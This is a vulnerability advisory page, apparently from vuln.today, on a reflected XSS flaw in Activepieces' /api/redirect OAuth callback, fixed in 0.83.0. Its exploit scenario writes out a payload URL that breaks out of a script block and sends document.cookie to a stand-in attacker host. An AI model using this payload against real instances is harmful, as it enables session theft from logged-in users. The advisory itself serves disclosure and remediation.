Skip to main content

Activepieces CVE-2026-73084

| EUVDEUVD-2026-56552 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-08-11 GitHub_M
6.1
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
6.1 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
6.1 MEDIUM

Network-delivered reflected XSS requires victim to click a crafted link (UI:R); injected script runs in the Activepieces origin causing scope change (S:C); no availability impact applies.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

3
Patch available
Aug 11, 2026 - 18:19 EUVD
Source Code Evidence Fetched
Aug 11, 2026 - 17:21 vuln.today
Analysis Generated
Aug 11, 2026 - 17:21 vuln.today

DescriptionCVE.org

Activepieces is an open source AI workflow automation platform. Prior to 0.83.0, the /api/redirect OAuth callback endpoint embeds the user-supplied code query parameter directly into an inline script block without proper escaping. A crafted request to /api/redirect with a malicious code value can break out of the script context and execute arbitrary JavaScript in the Activepieces origin when a logged-in user opens it. An unauthenticated attacker can access the victim's session tokens or make authenticated API calls on the victim's behalf. This issue is fixed in version 0.83.0.

AnalysisAI

Reflected XSS in Activepieces' OAuth callback endpoint /api/redirect allows an unauthenticated attacker to steal session tokens or execute authenticated API calls on behalf of logged-in users. Versions prior to 0.83.0 embed the user-supplied code query parameter directly inside an inline <script> block, enabling script context breakout via closing tag injection - a flaw the public patch commit fully discloses, substantially lowering the barrier to exploit development. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify target Activepieces instance
Delivery
Craft malicious /api/redirect?code= URL with </script> breakout payload
Exploit
Deliver URL to logged-in victim via phishing
Execution
Victim opens link in browser
Persist
Script executes in Activepieces origin
Impact
Exfiltrate session token or invoke authenticated API on victim's behalf

Vulnerability AssessmentAI

Exploitation The victim must be logged into Activepieces in the same browser session when they open the crafted link - exploitation relies on the browser sending the victim's authenticated session context, and fails entirely against unauthenticated users. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 6.1 (Medium) vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N is well-calibrated: the attack is network-reachable, low complexity, and requires no attacker credentials, but is gated on a victim opening a crafted link (UI:R). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies a publicly accessible Activepieces instance and crafts a URL such as `/api/redirect?code=x%3C/script%3E%3Cscript%3Efetch('https://attacker.example/steal?c='+document.cookie)%3C/script%3E`. The attacker delivers this URL to a logged-in Activepieces user via a phishing message; when the victim opens the link in their browser, the injected script executes in the Activepieces origin, silently exfiltrating the session token to the attacker's server. …
Remediation Upgrade to Activepieces version 0.83.0 or later, which fully resolves the injection by moving the OAuth code out of the script block into a DOM-read `<meta>` attribute and adding a Content-Security-Policy header. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-73084 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy